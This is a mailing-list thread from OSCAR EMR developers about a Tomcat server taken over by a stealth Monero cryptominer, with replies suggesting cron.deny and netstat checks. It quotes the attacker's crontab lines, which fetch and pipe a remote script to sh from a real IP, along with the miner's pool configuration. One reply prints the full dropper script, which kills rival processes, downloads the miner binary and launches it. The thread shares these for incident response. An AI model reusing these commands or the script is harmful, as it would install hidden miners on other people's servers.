Tomcat Vulnerability - Will bring down tomcat server

classic Classic list List threaded Threaded
25 messages Options
12
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Tomcat Vulnerability - Will bring down tomcat server

muki
It happens that one of my server was compromised by Russian hacker. It took long before I was able to solve the
problem. Hopefully, the following will help others. If tomcat shutdown without any log left behind you might
be having the same problem. Their app will use 99% of your CPU and prevents other app from running.
I am still trying to see how they get in to my system without trace but I believe they are using tomcat
user to create a crontab that connect to their site. The content of the crontab is below. 
 
*/9 * * * * wget -O - -q <A href="http://91.230.47.40/common/logo.jpg|sh">http://91.230.47.40/common/logo.jpg|sh
*/10 * * * * curl <A href="http://91.230.47.40/common/logo.jpg|sh">http://91.230.47.40/common/logo.jpg|sh
 
They used a random name of known Linux app name (i.e. iscsid) to make it difficult to detect.
They installed the program under /var/tmp and use tomcat user to run the program using their configuration file below.
 
{
    "url" : "stratum+tcp://37.59.51.212:80",
    "user" : "43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R",
    "pass" : "x",
    "algo" : "cryptonight",
    "quiet" : true
}
 
Solution:
If you delete the folder it will create it again via the crontab
If you delete the crontab it will find a way to login and create another one if your system is already compromised
 
The solution that I found effective is to deny crontab service to tomcat (tomcat6,tomcat7 or whatever tomcat version you are using)
and assigned long password to your tomcat user.
 
use "netstat -Wcatnp" to check if your system is still connected to their site (look for any of the ip address above)
and kill the process.
 
Muki

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: Tomcat Vulnerability - Will bring down tomcat server

Peter Hutten-Czapski-2
google stealth Monero miner

================
Peter Hutten-Czapski
Haileybury Ontario

"The attitude that ‘if rural people want these services they’ll have to come to the city to get them’ is simply not acceptable…” (Newbery, 1999)

Before printing, think about the environment. Avant d' imprimer, pensez à l'environnement.

On 29 May 2017 at 14:12, <[hidden email]> wrote:
It happens that one of my server was compromised by Russian hacker. It took long before I was able to solve the
problem. Hopefully, the following will help others. If tomcat shutdown without any log left behind you might
be having the same problem. Their app will use 99% of your CPU and prevents other app from running.
I am still trying to see how they get in to my system without trace but I believe they are using tomcat
user to create a crontab that connect to their site. The content of the crontab is below. 
 
 
They used a random name of known Linux app name (i.e. iscsid) to make it difficult to detect.
They installed the program under /var/tmp and use tomcat user to run the program using their configuration file below.
 
{
    "url" : "stratum+tcp://37.59.51.212:80",
    "user" : "43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R",
    "pass" : "x",
    "algo" : "cryptonight",
    "quiet" : true
}
 
Solution:
If you delete the folder it will create it again via the crontab
If you delete the crontab it will find a way to login and create another one if your system is already compromised
 
The solution that I found effective is to deny crontab service to tomcat (tomcat6,tomcat7 or whatever tomcat version you are using)
and assigned long password to your tomcat user.
 
use "netstat -Wcatnp" to check if your system is still connected to their site (look for any of the ip address above)
and kill the process.
 
Muki

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel



------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: Tomcat Vulnerability - Will bring down tomcat server

Colcamex Resources Inc.
In reply to this post by muki
Thank’s for this Muki. 

So you’re saying that anyone can gain access to the server via Tomcat user and create cron jobs?  This is scary to know given the set-up of most of our servers.  

________

Join the Community of OSCAR members at OSCAR CON 2017 Roadshow
Vancouver Island:  www.eply.com/oscarconvancouverisland
Vancouver:  www.eply.com/oscarconvancouver
________

Dennis Warren
Consultant
Colcamex Resources
[hidden email]
778.386.9264

On May 29, 2017, at 11:12 AM, <[hidden email]> <[hidden email]> wrote:

It happens that one of my server was compromised by Russian hacker. It took long before I was able to solve the
problem. Hopefully, the following will help others. If tomcat shutdown without any log left behind you might
be having the same problem. Their app will use 99% of your CPU and prevents other app from running.
I am still trying to see how they get in to my system without trace but I believe they are using tomcat
user to create a crontab that connect to their site. The content of the crontab is below. 
 
*/9 * * * * wget -O - -q <a href="http://91.230.47.40/common/logo.jpg|sh" class="">http://91.230.47.40/common/logo.jpg|sh
*/10 * * * * curl <a href="http://91.230.47.40/common/logo.jpg|sh" class="">http://91.230.47.40/common/logo.jpg|sh
 
They used a random name of known Linux app name (i.e. iscsid) to make it difficult to detect.
They installed the program under /var/tmp and use tomcat user to run the program using their configuration file below.
 
{
    "url" : "<a href="stratum+tcp://37.59.51.212:80" class="">stratum+tcp://37.59.51.212:80",
    "user" : "43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R",
    "pass" : "x",
    "algo" : "cryptonight",
    "quiet" : true
}
 
Solution:
If you delete the folder it will create it again via the crontab
If you delete the crontab it will find a way to login and create another one if your system is already compromised
 
The solution that I found effective is to deny crontab service to tomcat (tomcat6,tomcat7 or whatever tomcat version you are using)
and assigned long password to your tomcat user.
 
use "netstat -Wcatnp" to check if your system is still connected to their site (look for any of the ip address above)
and kill the process.
 
Muki
------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel


------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: Tomcat Vulnerability - Will bring down tomcat server

Thom Luxford-4
One way to blacklist a user to cron is:

echo -e "tomcat6\ntomcat7\n" >> /etc/cron.deny


On Mon, May 29, 2017 at 12:29 PM, Colcamex Resources Inc. <[hidden email]> wrote:
Thank’s for this Muki. 

So you’re saying that anyone can gain access to the server via Tomcat user and create cron jobs?  This is scary to know given the set-up of most of our servers.  

________

Join the Community of OSCAR members at OSCAR CON 2017 Roadshow
Vancouver Island:  www.eply.com/oscarconvancouverisland
Vancouver:  www.eply.com/oscarconvancouver
________

Dennis Warren
Consultant
Colcamex Resources
[hidden email]
<a href="tel:(778)%20386-9264" value="+17783869264" target="_blank">778.386.9264

On May 29, 2017, at 11:12 AM, <[hidden email]> <[hidden email]> wrote:

It happens that one of my server was compromised by Russian hacker. It took long before I was able to solve the
problem. Hopefully, the following will help others. If tomcat shutdown without any log left behind you might
be having the same problem. Their app will use 99% of your CPU and prevents other app from running.
I am still trying to see how they get in to my system without trace but I believe they are using tomcat
user to create a crontab that connect to their site. The content of the crontab is below. 
 
 
They used a random name of known Linux app name (i.e. iscsid) to make it difficult to detect.
They installed the program under /var/tmp and use tomcat user to run the program using their configuration file below.
 
{
    "user" : "43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R",
    "pass" : "x",
    "algo" : "cryptonight",
    "quiet" : true
}
 
Solution:
If you delete the folder it will create it again via the crontab
If you delete the crontab it will find a way to login and create another one if your system is already compromised
 
The solution that I found effective is to deny crontab service to tomcat (tomcat6,tomcat7 or whatever tomcat version you are using)
and assigned long password to your tomcat user.
 
use "netstat -Wcatnp" to check if your system is still connected to their site (look for any of the ip address above)
and kill the process.
 
Muki
------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel


------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel




--
+
Thom Luxford, B.HK B.CS
Project Manager IT
bCMDit Services Ltd.
(866) 922-6348, ext 101

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: Tomcat Vulnerability - Will bring down tomcat server

Peter Hutten-Czapski-2
excellent idea Thom, we don't need tomcat to run crontab
sudo crontab -u tomcat7 -e
will show if you have tomcat7 running anything
and will be denied if you have set up the deny as suggested

================
Peter Hutten-Czapski
Haileybury Ontario

"The attitude that ‘if rural people want these services they’ll have to come to the city to get them’ is simply not acceptable…” (Newbery, 1999)

Before printing, think about the environment. Avant d' imprimer, pensez à l'environnement.

On 29 May 2017 at 15:48, Thom Luxford <[hidden email]> wrote:
One way to blacklist a user to cron is:

echo -e "tomcat6\ntomcat7\n" >> /etc/cron.deny


On Mon, May 29, 2017 at 12:29 PM, Colcamex Resources Inc. <[hidden email]> wrote:
Thank’s for this Muki. 

So you’re saying that anyone can gain access to the server via Tomcat user and create cron jobs?  This is scary to know given the set-up of most of our servers.  

________

Join the Community of OSCAR members at OSCAR CON 2017 Roadshow
Vancouver Island:  www.eply.com/oscarconvancouverisland
Vancouver:  www.eply.com/oscarconvancouver
________

Dennis Warren
Consultant
Colcamex Resources
[hidden email]
<a href="tel:(778)%20386-9264" value="+17783869264" target="_blank">778.386.9264

On May 29, 2017, at 11:12 AM, <[hidden email]> <[hidden email]> wrote:

It happens that one of my server was compromised by Russian hacker. It took long before I was able to solve the
problem. Hopefully, the following will help others. If tomcat shutdown without any log left behind you might
be having the same problem. Their app will use 99% of your CPU and prevents other app from running.
I am still trying to see how they get in to my system without trace but I believe they are using tomcat
user to create a crontab that connect to their site. The content of the crontab is below. 
 
 
They used a random name of known Linux app name (i.e. iscsid) to make it difficult to detect.
They installed the program under /var/tmp and use tomcat user to run the program using their configuration file below.
 
{
    "user" : "43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R",
    "pass" : "x",
    "algo" : "cryptonight",
    "quiet" : true
}
 
Solution:
If you delete the folder it will create it again via the crontab
If you delete the crontab it will find a way to login and create another one if your system is already compromised
 
The solution that I found effective is to deny crontab service to tomcat (tomcat6,tomcat7 or whatever tomcat version you are using)
and assigned long password to your tomcat user.
 
use "netstat -Wcatnp" to check if your system is still connected to their site (look for any of the ip address above)
and kill the process.
 
Muki
------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel


------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel




--
+
Thom Luxford, B.HK B.CS
Project Manager IT
bCMDit Services Ltd.
<a href="tel:(866)%20922-6348" value="+18669226348" target="_blank">(866) 922-6348, ext 101

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel



------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: Tomcat Vulnerability - Will bring down tomcat server

Marc Dumontier
Which Tomcat version was running which allowed the system to get compromised?


On Mon, May 29, 2017 at 4:03 PM, Peter Hutten-Czapski <[hidden email]> wrote:
excellent idea Thom, we don't need tomcat to run crontab
sudo crontab -u tomcat7 -e
will show if you have tomcat7 running anything
and will be denied if you have set up the deny as suggested

================
Peter Hutten-Czapski
Haileybury Ontario

"The attitude that ‘if rural people want these services they’ll have to come to the city to get them’ is simply not acceptable…” (Newbery, 1999)

Before printing, think about the environment. Avant d' imprimer, pensez à l'environnement.

On 29 May 2017 at 15:48, Thom Luxford <[hidden email]> wrote:
One way to blacklist a user to cron is:

echo -e "tomcat6\ntomcat7\n" >> /etc/cron.deny


On Mon, May 29, 2017 at 12:29 PM, Colcamex Resources Inc. <[hidden email]> wrote:
Thank’s for this Muki. 

So you’re saying that anyone can gain access to the server via Tomcat user and create cron jobs?  This is scary to know given the set-up of most of our servers.  

________

Join the Community of OSCAR members at OSCAR CON 2017 Roadshow
Vancouver Island:  www.eply.com/oscarconvancouverisland
Vancouver:  www.eply.com/oscarconvancouver
________

Dennis Warren
Consultant
Colcamex Resources
[hidden email]
<a href="tel:(778)%20386-9264" value="+17783869264" target="_blank">778.386.9264

On May 29, 2017, at 11:12 AM, <[hidden email]> <[hidden email]> wrote:

It happens that one of my server was compromised by Russian hacker. It took long before I was able to solve the
problem. Hopefully, the following will help others. If tomcat shutdown without any log left behind you might
be having the same problem. Their app will use 99% of your CPU and prevents other app from running.
I am still trying to see how they get in to my system without trace but I believe they are using tomcat
user to create a crontab that connect to their site. The content of the crontab is below. 
 
 
They used a random name of known Linux app name (i.e. iscsid) to make it difficult to detect.
They installed the program under /var/tmp and use tomcat user to run the program using their configuration file below.
 
{
    "user" : "43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R",
    "pass" : "x",
    "algo" : "cryptonight",
    "quiet" : true
}
 
Solution:
If you delete the folder it will create it again via the crontab
If you delete the crontab it will find a way to login and create another one if your system is already compromised
 
The solution that I found effective is to deny crontab service to tomcat (tomcat6,tomcat7 or whatever tomcat version you are using)
and assigned long password to your tomcat user.
 
use "netstat -Wcatnp" to check if your system is still connected to their site (look for any of the ip address above)
and kill the process.
 
Muki
------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel


------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel




--
+
Thom Luxford, B.HK B.CS
Project Manager IT
bCMDit Services Ltd.
<a href="tel:(866)%20922-6348" value="+18669226348" target="_blank">(866) 922-6348, ext 101

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel



------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel




--

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: Tomcat Vulnerability - Will bring down tomcat server

Colcamex Resources Inc.
I believe it may be worth our effort to learn HOW a the Tomcat6/7 user was used to gain access to the server.   It’s not the cron job service that we should be concerned with.  

Cryptonight ( “the virus”) requires SUDOer to install. 
  
________

Join the Community of OSCAR members at OSCAR CON 2017 Roadshow
Vancouver Island:  www.eply.com/oscarconvancouverisland
Vancouver:  www.eply.com/oscarconvancouver
________

Dennis Warren
Consultant
Colcamex Resources
[hidden email]
778.386.9264

On May 29, 2017, at 1:08 PM, Marc Dumontier <[hidden email]> wrote:

Which Tomcat version was running which allowed the system to get compromised?


On Mon, May 29, 2017 at 4:03 PM, Peter Hutten-Czapski <[hidden email]> wrote:
excellent idea Thom, we don't need tomcat to run crontab
sudo crontab -u tomcat7 -e
will show if you have tomcat7 running anything
and will be denied if you have set up the deny as suggested

================
Peter Hutten-Czapski
Haileybury Ontario

"The attitude that ‘if rural people want these services they’ll have to come to the city to get them’ is simply not acceptable…” (Newbery, 1999)

Before printing, think about the environment. Avant d' imprimer, pensez à l'environnement.

On 29 May 2017 at 15:48, Thom Luxford <[hidden email]> wrote:
One way to blacklist a user to cron is:

echo -e "tomcat6\ntomcat7\n" >> /etc/cron.deny


On Mon, May 29, 2017 at 12:29 PM, Colcamex Resources Inc. <[hidden email]> wrote:
Thank’s for this Muki. 

So you’re saying that anyone can gain access to the server via Tomcat user and create cron jobs?  This is scary to know given the set-up of most of our servers.  

________

Join the Community of OSCAR members at OSCAR CON 2017 Roadshow
Vancouver Island:  www.eply.com/oscarconvancouverisland
Vancouver:  www.eply.com/oscarconvancouver
________

Dennis Warren
Consultant
Colcamex Resources
[hidden email]
<a href="tel:(778)%20386-9264" value="+17783869264" target="_blank" class="">778.386.9264

On May 29, 2017, at 11:12 AM, <[hidden email]> <[hidden email]> wrote:

It happens that one of my server was compromised by Russian hacker. It took long before I was able to solve the
problem. Hopefully, the following will help others. If tomcat shutdown without any log left behind you might
be having the same problem. Their app will use 99% of your CPU and prevents other app from running.
I am still trying to see how they get in to my system without trace but I believe they are using tomcat
user to create a crontab that connect to their site. The content of the crontab is below. 
 
 
They used a random name of known Linux app name (i.e. iscsid) to make it difficult to detect.
They installed the program under /var/tmp and use tomcat user to run the program using their configuration file below.
 
{
    "user" : "43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R",
    "pass" : "x",
    "algo" : "cryptonight",
    "quiet" : true
}
 
Solution:
If you delete the folder it will create it again via the crontab
If you delete the crontab it will find a way to login and create another one if your system is already compromised
 
The solution that I found effective is to deny crontab service to tomcat (tomcat6,tomcat7 or whatever tomcat version you are using)
and assigned long password to your tomcat user.
 
use "netstat -Wcatnp" to check if your system is still connected to their site (look for any of the ip address above)
and kill the process.
 
Muki
------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel


------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel




--
+
Thom Luxford, B.HK B.CS
Project Manager IT
bCMDit Services Ltd.
<a href="tel:(866)%20922-6348" value="+18669226348" target="_blank" class="">(866) 922-6348, ext 101

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel



------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel




--
------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel


------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: Tomcat Vulnerability - Will bring down tomcat server

Duncan Rozario
Wouldn't /var/log/auth.log show the unauthorized access to the system, and the user?
Duncan
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: Tomcat Vulnerability - Will bring down tomcat server

Luiz Rufato
In reply to this post by Peter Hutten-Czapski-2

Actually we does.

01 23 * * * /usr/share/oscar-emr/oscar_backup.sh
* * * * * /usr/share/oscar-emr/reOscar.sh
* * * * * /usr/share/oscar-emr/gateway.cron
00 23 * * Fri touch /tmp/tomcat7-tomcat7-tmp/restartOscar.action

This was installed by .deb.

I will research a bit more.


Em 29-05-2017 17:03, Peter Hutten-Czapski escreveu:
excellent idea Thom, we don't need tomcat to run crontab
sudo crontab -u tomcat7 -e
will show if you have tomcat7 running anything
and will be denied if you have set up the deny as suggested

================
Peter Hutten-Czapski
Haileybury Ontario

"The attitude that ‘if rural people want these services they’ll have to come to the city to get them’ is simply not acceptable…” (Newbery, 1999)

Before printing, think about the environment. Avant d' imprimer, pensez à l'environnement.

On 29 May 2017 at 15:48, Thom Luxford <[hidden email]> wrote:
One way to blacklist a user to cron is:

echo -e "tomcat6\ntomcat7\n" >> /etc/cron.deny


On Mon, May 29, 2017 at 12:29 PM, Colcamex Resources Inc. <[hidden email]> wrote:
Thank’s for this Muki. 

So you’re saying that anyone can gain access to the server via Tomcat user and create cron jobs?  This is scary to know given the set-up of most of our servers.  

________

Join the Community of OSCAR members at OSCAR CON 2017 Roadshow
Vancouver Island:  www.eply.com/oscarconvancouverisland
Vancouver:  www.eply.com/oscarconvancouver
________

Dennis Warren
Consultant
Colcamex Resources
[hidden email]
<a moz-do-not-send="true" href="tel:%28778%29%20386-9264" value="+17783869264" target="_blank">778.386.9264

On May 29, 2017, at 11:12 AM, <[hidden email]> <[hidden email]> wrote:

It happens that one of my server was compromised by Russian hacker. It took long before I was able to solve the
problem. Hopefully, the following will help others. If tomcat shutdown without any log left behind you might
be having the same problem. Their app will use 99% of your CPU and prevents other app from running.
I am still trying to see how they get in to my system without trace but I believe they are using tomcat
user to create a crontab that connect to their site. The content of the crontab is below. 
 
 
They used a random name of known Linux app name (i.e. iscsid) to make it difficult to detect.
They installed the program under /var/tmp and use tomcat user to run the program using their configuration file below.
 
{
    "user" : "43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R",
    "pass" : "x",
    "algo" : "cryptonight",
    "quiet" : true
}
 
Solution:
If you delete the folder it will create it again via the crontab
If you delete the crontab it will find a way to login and create another one if your system is already compromised
 
The solution that I found effective is to deny crontab service to tomcat (tomcat6,tomcat7 or whatever tomcat version you are using)
and assigned long password to your tomcat user.
 
use "netstat -Wcatnp" to check if your system is still connected to their site (look for any of the ip address above)
and kill the process.
 
Muki
------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel


------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel




--
+
Thom Luxford, B.HK B.CS
Project Manager IT
bCMDit Services Ltd.
<a moz-do-not-send="true" href="tel:%28866%29%20922-6348" value="+18669226348" target="_blank">(866) 922-6348, ext 101

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel




------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot


_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel


------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: Tomcat Vulnerability - Will bring down tomcat server

Luiz Rufato

Virus code:


rufato@aton:~$ cat logo.jpg
#!/bin/sh
rm -rf /var/tmp/jmvsmwoia.conf
rm -rf /var/tmp/iscsid
ps auxf|grep -v grep|grep -v mgvdhrhyo|grep "/tmp/"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "jmvsmwoia"|awk '{print $2}'|xargs kill -9
ps -fe|grep mgvdhrhyo|grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
chmod 777 /var/tmp/mgvdhrhyo.conf
rm -rf /var/tmp/mgvdhrhyo.conf
curl -o /var/tmp/mgvdhrhyo.conf http://91.230.47.40/common/kworker.conf
wget -O /var/tmp/mgvdhrhyo.conf http://91.230.47.40/common/kworker.conf
chmod 777 /var/tmp/acpid
rm -rf /var/tmp/acpid
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
curl -o /var/tmp/acpid http://91.230.47.40/common/kworker
wget -O /var/tmp/acpid http://91.230.47.40/common/kworker
else
curl -o /var/tmp/acpid http://91.230.47.40/common/kworker_na
wget -O /var/tmp/acpid http://91.230.47.40/common/kworker_na
fi
chmod +x /var/tmp/acpid
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./acpid -c mgvdhrhyo.conf -t `echo $cores` >/dev/null &
else
echo "runing....."
fi


Em 29-05-2017 19:35, Luiz Rufato escreveu:

Actually we does.

01 23 * * * /usr/share/oscar-emr/oscar_backup.sh
* * * * * /usr/share/oscar-emr/reOscar.sh
* * * * * /usr/share/oscar-emr/gateway.cron
00 23 * * Fri touch /tmp/tomcat7-tomcat7-tmp/restartOscar.action

This was installed by .deb.

I will research a bit more.


Em 29-05-2017 17:03, Peter Hutten-Czapski escreveu:
excellent idea Thom, we don't need tomcat to run crontab
sudo crontab -u tomcat7 -e
will show if you have tomcat7 running anything
and will be denied if you have set up the deny as suggested

================
Peter Hutten-Czapski
Haileybury Ontario

"The attitude that ‘if rural people want these services they’ll have to come to the city to get them’ is simply not acceptable…” (Newbery, 1999)

Before printing, think about the environment. Avant d' imprimer, pensez à l'environnement.

On 29 May 2017 at 15:48, Thom Luxford <[hidden email]> wrote:
One way to blacklist a user to cron is:

echo -e "tomcat6\ntomcat7\n" >> /etc/cron.deny


On Mon, May 29, 2017 at 12:29 PM, Colcamex Resources Inc. <[hidden email]> wrote:
Thank’s for this Muki. 

So you’re saying that anyone can gain access to the server via Tomcat user and create cron jobs?  This is scary to know given the set-up of most of our servers.  

________

Join the Community of OSCAR members at OSCAR CON 2017 Roadshow
Vancouver Island:  www.eply.com/oscarconvancouverisland
Vancouver:  www.eply.com/oscarconvancouver
________

Dennis Warren
Consultant
Colcamex Resources
[hidden email]
<a moz-do-not-send="true" href="tel:%28778%29%20386-9264" value="+17783869264" target="_blank">778.386.9264

On May 29, 2017, at 11:12 AM, <[hidden email]> <[hidden email]> wrote:

It happens that one of my server was compromised by Russian hacker. It took long before I was able to solve the
problem. Hopefully, the following will help others. If tomcat shutdown without any log left behind you might
be having the same problem. Their app will use 99% of your CPU and prevents other app from running.
I am still trying to see how they get in to my system without trace but I believe they are using tomcat
user to create a crontab that connect to their site. The content of the crontab is below. 
 
 
They used a random name of known Linux app name (i.e. iscsid) to make it difficult to detect.
They installed the program under /var/tmp and use tomcat user to run the program using their configuration file below.
 
{
    "user" : "43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R",
    "pass" : "x",
    "algo" : "cryptonight",
    "quiet" : true
}
 
Solution:
If you delete the folder it will create it again via the crontab
